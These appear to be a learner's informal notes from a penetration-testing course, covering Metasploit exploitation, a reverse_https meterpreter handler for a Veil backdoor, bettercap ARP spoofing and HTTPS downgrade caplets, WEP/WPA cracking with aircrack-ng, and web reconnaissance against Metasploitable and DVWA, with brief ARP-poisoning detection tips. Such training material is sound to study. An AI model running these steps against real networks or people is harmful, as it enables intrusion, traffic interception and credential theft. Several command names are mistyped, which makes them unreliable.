Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks. > msfconsole - runs the metasploit console > help - shows help > show [something] - something can be exploits, payloads, auxiliaries or options. > use [something] - use a certain exploit, payload or auxiliary > set [option] [value] - configure [option] to have a value of [value] > exploit - runs the current task You can search up exploits like "[service name] exploit". Rapid7 is a popular trusted metasploit company that will associate a certain service and find a exploit if there is one. Its a trial and error practice. Some might work some might not Once you got the exploit model (short command that is the exploit). open up metasploit with the command "msfconsole". use the exploit so "use [exploit code]". Then do "show option" to show all the options to change for the particular exploit. Once you have shown the exploit, change the RHOST/LHOST to the specified IP address of the target with "set RHOST (or LHOST) [target IP]". This will match the target with the exploit. do "show options" to see if it is correctly associated. Once sure, you can run "exploit". Be sure to do it again if it doesn't work the first time. You now have remote root access to the target machine. Code Execution Vulnerability to access remote service: Payload are small piece of code that will be executed on the target computer once the vulnerability has been exploited bind payloads will open a port on the target computer and you connect to that port reverse payloads will open a port on your machine and will have the target computer connect to you. It allows to bypass firewalls if you dont have any firewalls on. to show payloads, do "show payload" while being in the directory of a certain exploit. you will usually have more options once you set a certain payload with "set payload [payload]" if you have more options once you do "show options", be sure to set it with the target IP. You can set the port to your desired port of either a bind or reverse payload. like "set RPORT (or LPORT) [port number] once finished and target ip is associated with the RHOST/LHOST, do "exploit". Now you'll have access to what exploit you exploited.
Installing Metasploitable as a VM
Metaspoitable is a vulnerable linux distro, this OS contains a number of vulnerabilities and it is designed for pentesters to try and hack it This is going to be one of the victims that we will try to hack, and it contains a number of services and programs to imitate a server This will be used to test server side attacks Once downloading Metasploitable from the link, unzip it. Create a new VM, and the distro is your choice. Use existing disk and navigate to the metasploitable file. After you run it, it will ask for login: username "msfadmin", password "msfadmin". "sudo poweroff" will exit the admin and ask admin password
Server Side Attacks
Need an IP address: - Very simple if target is on the same network - If target has domain, then simple ping to the domain (www.whatever.com) will return its IP - Getting the IP is trickier if the target is a personal computer, might be useless if the target is accessing the internet through a network as the IP will be the router IP and not the targets. Client side attacks are more effective in this case as reverse connection can be used Be sure your kali machine is using a NAT network first, try to ping the metasploitable. Do Ifconfig on the meta machine, and then go to your kali machine and ping that IP to be sure your connected You can use the meta IP to go to that specific meta website
Nexpose (Server Side)
Nexpose is a vulnerability management framework, it allows us to discover, assess and act on discovered vulnerabilities. It also tells us a lot of info about the discovered vulnerabilities like weather they are exploitable. At the end, it helps us write a report at the end of the assessment Download it from rapid7 with bing in the vm, so just look up bing and look up and download from there. Once you downloaded it, go to your terminal, do "service postgresql stop". Go to the downloads directory so "cd Downloads". Change file permission to execute so "chmod +x NeXposeSetup-Linux64.bin" execute it so "./NeXposeSetup-Linux64.bin". You will get a installer for it. Set to port 5435. Fill out personal data (Frosty, Eclipse, [email protected], etc.). Dont check the "start after installation box". Follow these steps in commands: "service postgresql stop" "cd /opt/rapid7//nexpose/" "cd nsc" "./nsc.sh" after it runs, go to the "https://localhost:3780/" that is also mentioned at the last section of that run command output. login with the username and password. The product key is in the email that was registered to it. Having your target IP, you can use authentication to log in to theirs, a lot of scanning options and scheduling etc. The results will show detailed: Assessment Status, Operating System, Exploitable assets by skill level, malware, exploits, vulnerability. It even allows you to choose a detailed report of the problems/solutions to give based on what type of skill level or position the person is. Nexpose is really helpful in vulnerability and exploit scanning.
Nmap
Nmap/Zenmap - Zenmap is just the GUI (Graphical User Interface) of Nmap - Huge security scanner - From an IP/IP range it can discover: > Open ports > Running services > Operating system > Connected clients > more A range of local IP address is done by looking up your IP that is connected to the network, and have the last digit be 1/24 Not all devices respond to ping Quicks scan will discover open ports Quick scan plus will show the OS, device type, program version running like SSH 6.1 where you can exploit it based on the version By default, iOS automatically install an SSH server to jailbroken phones. The default password is "alpine" "ssh root@[IP address]" will prompt you and then ask what the password is. After that, you'll have root access
Discovering Devices Connected to the same network
Post-Connection Attacks: - Discover all devics on the network - Display their: IP address MAC address OS Open ports Running services "netdiscover -r 10.0.2.1/24" will search all the IPs in the range of 10.0.2.1 - 10.0.2.24 in the network" if you want to attack a wireless network, you will need a wireless adapter You cannot access the built in wireless card from a virtual machine
HTTPS
Problem: - Data in HTTP is sent as plain text - A MitM can read and edit requests and responses t- Encrypted HTTP using TLS (Transport Layer Security) or SSL (Secure Sockets Layer)' Easiest solution is to downgrade HTTPS to HTTP with MitM by giving the victim HTTP Configure and use a tool called SSL strip is the original easy way, but bettercap already has a caplet that will do it for us. Zsecurity has a modified version of the caplet that can do all https links besides hsts since the bettercap one doesn't include certain tricks with bypassing HSTS Extract it from the zip, copy it and paste it to /usr/share/bettercap/caplets. Delete the hstshijack caplet and replace it with the one in your clipboard Also if you want to do sniff HTTPS, you need to edit the whatever.cap and add "set net.sniff.local true" to the second last line. Bypassing HTTPS the skid way: first, use your own spoof caplet (whatever.cap) then, run the hstshijack.cap by itself in command clear cache on your web browser so it won't load in web cache if you go there frequently very popular websites using HTTPS may not be able to be sniffed because it's using HSTS After you do open
Web Penetration Testing part 2
Subdomains: - subdomains are the first section of a website name, like "beta.facebook.com" - Subdomains are not shown on the search engine, and only on some websites that have it for like employee or VIPs. - subdomains tend to be a lot more vulnerable then the actual websites - Knock can be used to find subdomains of target do "git clone http://github.com/guelfoweb/knock.git" and that will d ownload the tool. go to that directory with "cd knock/knockpy/". open knockpy.py with python linked with the website you want to get the subdomain from. "python knockpy.py isecurity.org". It will list website information and it will show a list of subdomains that are shown and not shown. Discovering Files and Directories using a tool called Drip. Being on metasploitable, you can check out your files at your webserver that your trying to get to with "cd /var/www", then "ls" or "ls -la". This will list the files and your websites. You can go further and do "cd [directory name]" and you can list files within that files. Now go to your kali machine and check out dirp with "man dirp". The way it works is it uses a word list that it sends a request with it and it will return files depending on the word list you provide. "dirb [target] [wordlist] [options]" We will only be targeting mutillidae and don't want to interfere with other website as it can take longer to search other websites. so we will do a simple "dirb http://10.20.14.204/mutillidae/", This will assume default wordlist and no set options. The phpinfo file will show a lot of information about the website that can be exploited. The robot.txt file is a small list of things that the admin put that is not visible by google. You can use the password file found on the robot.txt and snap that in the end of the url after /mutillidae/. This will show passwords of random things on the website that we dont know. You can also access the file config.inc, which will show their files that you can use to access the database.
Creating custom Spoofing script
This tends to be time consuming to put all the commands in for the bettercap arp spoof method, so you can use custom spoofing scripts to speed it up Caplet is a text file that contains all the commands you want to put: net.probe.on set arp.spoof.fullduplex true set arp.spoof.targets [target IP] arp.spoof on net.sniff on Save your text file to root directory and call it "whatever.cap" ("bettcap --help" shows the commands for bettercap) "bettercap -iface [interface] -caplet whatever.cap" will do it automatically and you'll be sniffing immediately
WPA/WPA Cracking part 3
Two things needed to crack WPA/WPA2: 1. 4-way handshake 2. Wordlist Handshake loadout: - SP Address - STA Address - AP Nonce - STA Nonce - EAPOL - Paylod and MIC (Message Integrity Code) which verifies if the password is correct or not It will combine the data of the handshake with a word within the wordlist to generate a MIC, and if that MIC is equal to the MIC in the handshake, its authenticated with the handshake in a file and your generated wordlist, you can generate the command to try to crack it "aircrack -ng handshake-01.cap -w test.txt" and find the key! The speed of it depends on your processor and your wordlist size You can also implement your handshake file into online services that have huge wordlists and super computers
WEP cracking for busy network
WEP cracking: - Wired Equivalent Privacy - Old encryption - Uses an algorithm called RC4 - Still used in some networks - Can be cracked easily - cracking a higher byte WEP will take longer and requires more IVs Encryption: - Each packet is encrypted using a unique key stream - Random Initialization Vector (IV) is used to generate the key streams - The Initialization Vector is only 24 bits! - IV + Key (password) = Key stream Result: - IV is too small (only 24 bits) - IV is sent in plain text - IV's will repeat on busy networks - This makes WEP vulnerable to statistical attacks - Repeated IVs can be used to determine to key stream - And break the encryption Conclusions: - Capture a large number of pacekts/IV using "airodump -ng" - Analyze the captured IVs and crack the key using "aircrack -ng" "airdump -ng --bssid [BSSID value] --channel [channel #] --write hello_storage [wireless interface]" will pull up that specific network using your wireless interface that has monitor mode and dump the data to a file called hello_storage #Data shows the number of packets that have a different IV. The higher the #Data, the more likely you'll crack it After enough #Data has been captured (~100,000), you can do "ls" to see the dumped file called "hello_storage-01.cap". The file will add a "-01" if not already added, and you want to look for the ".cap" file. "aircrack -ng hello_storage-01.cap" will decrypt it and will always give out the key and sometimes the ASCII which is the exact clear password If you want to connect to the network with the key, then you have to copy the key and paste it somewhere, remove the colons and then boom. thats your wifi password that will work for that network as well as the ASCII (different passwords but work the same)
Web Penetration Testing
What is a Website? - Its a computer with OS and some servers with a web server and a database like Apache, MySQL, etc. - Contains web applications that uses languages like PHP, Python, etc. - Web applications get executed on the servers and not on the clients machine - If we want anything to get executed on the web server, we have to send it in a language that it understands - a JavaScript website will execute the code on your machine instead of the web server like the other languages How to hack a website? - An application installed on a computer which will be web application testing - Computer uses an OS and other applications will be server side attacks - Managed by humans will be client side attacks We will be trying to do web application testing since we have already done server side and client side attacks Check your metasploitable IP address and make sure its in the same network as the machine that your checking the website with. Do "ls /var/www" to check the contents of your metasploitable website. Go to the other machine and go to the metasploitable IP to check the website that will list vulnerable websites that you can test. The DVWA uses a login that is "admin" with a pass "password". Go to the DVWA Security tab and set the security level to low. Same goes with the Mutillidae website. Information Gathering: As much info as possible like IP address, Domain name info, Technologies used, Other websites on the same server, DNS records, Unlisted files, sub-domains, directories Whois Lookup - Find a lot of info about the target with just the domain (website name) Netcraft Site Lookup - Shows technologies used on the target Robtex DNS lookup - Shows comprehensive info about the target website Using that information: Analyze what language they use for client side and server side with netcraft. You can also find web applications and then look up vulnerabilities within that web application. You can find exploits on "www.exploit-db.com" Robtex DNS lookup will show the most info about the website with a ton of information that you can use to hack and exploit. - One server can serve a number of websites - Gaining access to one can help gaining access to others to find websites on the same server, use the Robtex DNS lookup under "names pointing to same IP". Then using bing, search for "ip: [target IP]". Shows all websites with the same IP. If you ping 2 websites that are within the same server, they should have the same IP address.
Capturing data from ARP spoofing with Bettercap
While being on bettercap mode and doing the procedures mentioned previously: "net.sniff on" will capture everything, but not for HTTPS, even logins etc. Text is colored for user convenience
Detecting ARP Poisoning Attacks
Why ARP Spoofing is possible: 1. Clients accept responses even if they did not send a request 2. Clients trust response without any form of verification You can keep checking the ARP table to see changes to the MAC address of the router so you can detect ARP poisoning the tool Xarp will automatically monitor ARP table and the ARP table the mac address changed to is the hackers machine
WiFi Bands
WiFi Bands: - Decide the frequency range that can be used - Determines the channels that can be used - Clients need to support band used by router to communicate with it - Data can be sniffed from a certain band if the wireless adapter used supports that band most common WiFi bands: "a" uses 5 Ghz frequency only "b, g" both use 2.4 Ghz frequency only "n" uses 5 and 2.4 Ghz "ac" uses frequencies lower than 6 Ghz airodump -ng will only sniff 2.4 Ghz unless you specify it to listen 5 Ghz and even both. If your not seeing anything, then your router is only broadcasting 5 Ghz. with routers broadcasting 2.4/5 Ghz, you can see some and some you cant see a lot of wireless adapters will support 5 Ghz, but very few will only support 5 Ghz and monitor mode "airodump -ng --band a [interface name]" will capture wireless networks with 5 Ghz band "airodump -ng --band abg [interface name]" will capture networks with 2.4 and 5 Ghz which will be slower and you need a powerful wireless adapter for it. You can only do it if your wireless adapter supports the specified band. Remember, use band "a" if you cant see some wireless connections so it also shows 5 Ghz, again, only if you support 5 Ghz.
Configuring Wireless Settings
Within router configuration, usually 192.168.0.1: - Disable WPS - A Whitelist will only grant certain people in and will ignore anyone accessing it even with the key, and vice versa with Deny list
Discovering suspicious activities
You can set Wireshark in settings to discover ARP requests storms so it will discover people who try to discover all the devices on the network, like the command "netdiscover" that hackers can use. If there is an ARP attack or ARP storm, it will show that info under Analyze > Expert information You can configure the ARP table so set each mac address will be associated with its IP address and turning them static. Static data cant be changed, so that prevents ARP attacks. Once you do that, you will have to manually configure the network or device connecting to you
wireless modes
iwconfig shows the wireless connections only Managed mode is the default mode and it will only capture packets that have the destination mac as the mac address of the device Monitor Mode will capture all packets that are within range in order to go to monitor mode, you will first need to turn off that wireless connection with the command, kill any processes interfering wirelessly which is optional, change it to monitor mode, then turn the wireless connection on "airmon -ng check kill" will kill any process that interfere wirelessly and it will speed up attacks attacks that use monitor dont use any internet connection "iwconfig [interface name] mode monitor" which will change the mode to monitor mode not all wireless adapters support monitor mode
Listening for incoming connections (Client side)
on a terminal, open Metasploit with "msfconsole" which is a huge framework for pentesting. to listen for incoming connections, use a model that helps to listen for incoming payloads. "use exploit/multi/handler". change the reverse_tcp to reverse_https since that's what we are trying to listen to. so "set PAYLOAD windows/meterpreter/reverse_https" since that's what we set out backdoor before as. "show options to refresh to check if its https. set the attributes with the previous backdoor that was generated with veil. so "set LHOST [IP address]", and "set LPORT 8080". "show options" to check now do "exploit". now Metasploit is waiting for the backdoor connection. Testing the backdoor: Testing the backdoor by putting the backdoor on our webserver with the local kali website and downloading it from the target host. Purely for testing, probably wont work on a real person since it's so specific and asking to execute a file. Later on, we will demonstrate how to do it more... slick ;))) search up the path in files "/var/www/html/" is the location of the kali website. create a directory by right clicking on it, then have it called like "evil files". do Ctrl+T to create a temporary new file. then type on the path "/var/lib/veil-evasion/output/compiled/" (which was mentioned when you generated the backdoor) press enter. then copy it and paste it to "evil files". to start the website, go in a second terminal and type "service apache2 start". now in your windows machine, search up your kali IP address + / to enter your kali website. Now to go to the directory of the backdoor, add "evil-files" to the end of the url (or IP address). Once the link was clicked and executed, the kali machine will get the ip address of the person who clicked it. Back to your first terminal, you will be in a meterpreter session which allows you to do anything on the target machine.